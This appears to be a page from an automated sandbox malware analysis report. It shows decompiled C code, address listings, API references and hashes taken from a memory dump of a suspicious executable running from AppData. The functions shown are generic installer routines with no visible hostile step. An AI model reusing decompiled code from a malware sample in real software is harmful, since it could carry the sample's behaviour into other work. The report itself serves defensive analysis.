                          													continue;
                          												} else {
                          													L80:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406355
                          0x00406355
                          0x00406359
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x00406364
                          0x00406371
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                          • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405DA3(signed int _a4) {
                          				struct HINSTANCE__* _t5;
                          				CHAR* _t7;
                          				signed int _t9;
                          
                          				_t9 = _a4 << 3;
                          				_t7 =  *(_t9 + 0x409218);
                          				_t5 = GetModuleHandleA(_t7);
                          				if(_t5 != 0) {
                          					L2:
                          					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                          				}
                          				_t5 = LoadLibraryA(_t7); // executed
                          				if(_t5 != 0) {
                          					goto L2;
                          				}
                          				return _t5;
                          			}






                          0x00405dab
                          0x00405dae
                          0x00405db5
                          0x00405dbd
                          0x00405dca
                          0x00000000
                          0x00405dd1
                          0x00405dc0
                          0x00405dc8
                          0x00000000
                          0x00000000
                          0x00405dd9

                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                          • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                          • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E0040575C(CHAR* _a4, long _a8, long _a12) {
                          				signed int _t5;
                          				void* _t6;
                          
                          				_t5 = GetFileAttributesA(_a4); // executed
                          				asm("sbb ecx, ecx");
                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                          				return _t6;
                          			}





                          0x00405760
                          0x0040576d
                          0x00405782
                          0x00405788

                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00405760
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040573D(CHAR* _a4) {
                          				signed char _t3;
                          				int _t5;
                          
                          				_t3 = GetFileAttributesA(_a4); // executed
                          				if(_t3 != 0xffffffff) {
                          					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                          					return _t5;
                          				}
                          				return _t3;
                          			}





                          0x00405741
                          0x0040574a
                          0x00405753
                          0x00000000
                          0x00405753
                          0x00405759

                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031A8(void* _a4, long _a8) {
                          				int _t6;
                          				long _t10;
                          
                          				_t10 = _a8;
                          				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                          				if(_t6 == 0 || _a8 != _t10) {
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x004031ac
                          0x004031bf
                          0x004031c7
                          0x00000000
                          0x004031ce
                          0x00000000
                          0x004031d0

                          APIs
                          • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031DA(long _a4) {
                          				long _t2;
                          
                          				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                          				return _t2;
                          			}




                          0x004031e8
                          0x004031ee

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                          				struct HWND__* _v8;
                          				struct HWND__* _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				void* _v24;
                          				long _v28;
                          				int _v32;
                          				signed int _v40;
                          				int _v44;
                          				signed int* _v56;
                          				intOrPtr _v60;
                          				signed int _v64;
                          				long _v68;
                          				void* _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				void* _v84;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				struct HWND__* _t182;
                          				intOrPtr _t183;
                          				int _t189;
                          				int _t196;
                          				intOrPtr _t198;
                          				long _t202;
                          				signed int _t206;
                          				signed int _t217;
                          				void* _t220;
                          				void* _t221;
                          				int _t227;
                          				intOrPtr _t231;
                          				signed int _t232;
                          				signed int _t233;
                          				signed int _t240;
                          				signed int _t242;
                          				signed int _t245;
                          				signed int _t247;
                          				struct HBITMAP__* _t250;
                          				void* _t252;
                          				char* _t268;
                          				signed char _t269;
                          				long _t274;
                          				int _t280;
                          				signed int* _t281;
                          				int _t282;
                          				long _t283;
                          				signed int* _t284;
                          				int _t285;
                          				long _t286;
                          				signed int _t287;
                          				long _t288;
                          				signed int _t291;
                          				int _t294;
                          				signed int _t298;
                          				signed int _t300;
                          				signed int _t302;
                          				intOrPtr _t309;
                          				int* _t310;
                          				void* _t311;
                          				int _t315;
                          				int _t316;
                          				int _t317;
                          				signed int _t318;
                          				void* _t320;
                          				void* _t328;
                          				void* _t331;
                          
                          				_v12 = GetDlgItem(_a4, 0x3f9);
                          				_t182 = GetDlgItem(_a4, 0x408);
                          				_t280 =  *0x423ec8; // 0x75401c
                          				_t320 = SendMessageA;
                          				_v8 = _t182;
